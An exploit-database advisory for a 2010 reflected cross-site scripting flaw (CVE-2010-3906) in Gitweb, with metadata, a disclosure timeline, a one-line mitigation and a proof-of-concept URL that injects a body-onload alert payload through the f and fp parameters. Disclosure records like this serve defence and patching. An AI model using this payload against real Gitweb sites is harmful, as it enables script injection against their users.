header-logo
Suggest Exploit
vendor:
Gitweb
by:
Emanuele 'emgent' Gentili
7,5
CVSS
HIGH
Cross-site scripting (XSS)
79
CWE
Product Name: Gitweb
Affected Version From: 1.7.3.3
Affected Version To: Previous versions
Patch Exists: YES
Related CWE: CVE-2010-3906
CPE: a:git:gitweb
Metasploit: https://www.rapid7.com/db/vulnerabilities/suse-cve-2010-3906/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-1003/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

Cross-site scripting (XSS) vulnerability in Gitweb 1.7.3.3 and previous versions

Remote attackers can inject arbitrary web script or HTML code via f and fp variables by using the URL http://localhost/?p=foo/bar/ph33r.git;a=blobdiff;f=[XSS];fp=[XSS], where [XSS] is the malicious code.

Mitigation:

Input validation and output encoding can be used to mitigate XSS attacks.
Source

Exploit-DB raw data:

>-8 Description 8-<
Cross-site scripting (XSS) vulnerability in Gitweb 1.7.3.3 and previous versions
allows remote attackers to inject arbitrary web script or HTML code via f and fp variables.

>-8 Proof Of Concept 8-<
http://localhost/?p=foo/bar/ph33r.git;a=blobdiff;f=[XSS];fp=[XSS]
[XSS] => "><body onload="alert('xss')"> <a


>-8 Credits 8-<
Emanuele 'emgent' Gentili <e.gentili@tigersecurity.it>


>-8 Responsible Disclosure 8-<

13-12-2010	Initial contact with upstream and vendor-sec
13-12-2010	Vendor Response and CVE-2010-3906 assignation
15-12-2010	Public Disclosure

Navigation

Suggest Exploit

Services By CQR